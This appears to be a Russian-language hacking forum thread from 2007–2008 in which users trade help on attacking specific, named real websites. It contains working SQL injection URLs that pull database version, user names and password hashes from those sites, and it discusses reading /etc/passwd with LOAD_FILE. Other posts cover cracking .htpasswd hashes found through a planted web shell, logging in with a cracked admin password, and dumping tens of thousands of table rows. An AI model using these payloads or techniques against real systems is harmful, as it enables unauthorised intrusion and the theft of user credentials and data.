Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    Да, там просто читалка

    будем искать конфиги
     
  2. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    подскажите пожлста уязвим ли первый параметр?
    http://events.umn.edu/event?occurrence=408233;event=120318
     
  3. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    http://events.umn.edu/event?occurrence=408234-1 - кажись уязвим...сейчас покопаю
     
  4. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    И вот тут заоббно помогите
    http://www.logobook.ru/prod_show.php?object_uid=11048116'
     
  5. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Подскажите LOAD_FILE('/etc/passwd')
    так и указывать? /etc/passwd? или надо полный путь найти если да то как?
     
  6. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Вообще то /etc/passwd и есть полный путь=\
     
  7. none222

    none222 Guest

    Reputations:
    0
    путь относительно корня (прлный). Если тебе нужно прочитать скрипт, то ищи раскрытие путей через выведенные ошибки или подбором (на практике, никогда не получалось)
     
  8. ~Taxa~

    ~Taxa~ New Member

    Joined:
    24 Jan 2008
    Messages:
    19
    Likes Received:
    4
    Reputations:
    -1
    Хотел узнать есть шелл на нем я нашел файлик .htpasswd открыл его там имеет запись виде:
    Я так понял это акки, но для чего??? И в каком виде зашифрованы пароли???
     
  9. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    посмотри рядом лежащие htaccess'ы, в них разгадка. пассы в DES'e
     
    _________________________
  10. ~Taxa~

    ~Taxa~ New Member

    Joined:
    24 Jan 2008
    Messages:
    19
    Likes Received:
    4
    Reputations:
    -1
    +toxa+ огромное спасибо ты был прав в файле htacces был урл =). Теперь нужно рассшифровать пассы)
     
  11. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    passwordspro тебе в помощь)
     
    _________________________
  12. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Вот обьясните мне, ну вот нашел я уязвимость в скрипте вот
    http://www.build.kz/index.php?page=inc/cut&sector=comp&action=sublist&cid=-1+union+select+concat(user(),char(58),version(),ch ar(58),database()),2+/*

    А как мне имена таблиц то и столбцов подобрать??? версия скулы то 4 чем пользоваться? или есть базы? поделитесь пжлст)))
     
  13. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Вот тут список дефолтовских таблиц и полей:
    http://forum.antichat.ru/showpost.php?p=465677&postcount=3
    подбирай
     
    #1113 l-l00K, 4 Mar 2008
    Last edited: 4 Mar 2008
    1 person likes this.
  14. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    2 truelamer
    Ручками, то есть - ручной брутфорс, а вообще - там есть табла users - тебе осталось только колонки подобрать
     
  15. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Спасибо
    вот что я нашел
    http://www.build.kz/index.php?page=inc/cut&sector=comp&action=sublist&cid=-1+union+select+concat(users_name,char(58),users_password),2+from+users%20limit+0,1/*
    только проблема обьясните там что хэш пароля не до конца вылез или как? и почему то лимитом листать не получается что только один пользователь?
     
  16. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Там один пользователь, это MySQL хэш, расшифровывается как admin
     
  17. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Спасибо!!!!! блин жаль я тебе hgenfwbb мало первый раз добавил)))
    А что меня не хотит пускать под
    login: Administrator
    pass:admin
    что такое?

    Да и срузу же паралельно вопросик чем расшифровать MySQL хэш
     
    #1117 truelamer, 4 Mar 2008
    Last edited: 4 Mar 2008
  18. ~Taxa~

    ~Taxa~ New Member

    Joined:
    24 Jan 2008
    Messages:
    19
    Likes Received:
    4
    Reputations:
    -1
    Есть sql инъекция, столкнулся с такой проблемой: функцией count() через sql запрос показывает, что в таблице 30789 записей, когда даю запрос "limit+50,1" запрос выполняется и выводит 50-ую строку, но когда вбиваю "limit+100,1" то данные не выводятся. Плюс ко всему запрос работает и так "limit+1,5000" и выдаёт мне 5000 строк из таблицы, а когда запрашиваю "limit+1,9000" то не выводит ничего, просто пустую (белую) страницу выдаёт. В чём суть проблемы и возможно ли вывести все ~30к?
     
  19. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    покажи на примере. вообще не выводятся? есть ли возможность что те значения пустые? то что не выводит 9к записей - скорее всего просто или у пхп память кончается (memory limit exceed) ну или чтониб подобное с нехваткой ресурсов, что тебе мешает сделать несколько запросов

    limit+1,5000
    limit+5000,10000
    limit+10000,15000

    и тд )
     
  20. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    limit+1+offset+номер по порядку
    пробовал ?
    ИМХО- скорее всего из-за ограниченных прав

    И такой вопрос, имею запрос вида
    -1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+from+INFORMATION_SCHEMA.COLUMNS+limit+1250/*
    как его можна изменить чтобы выводить не по одной строчке а вывести все сразу, limit+100,1 и limit+100,1
    пробовал

    не наказывайте если не в этом разделе надо писать
     
    #1120 neon_fx, 4 Mar 2008
    Last edited: 4 Mar 2008
Thread Status:
Not open for further replies.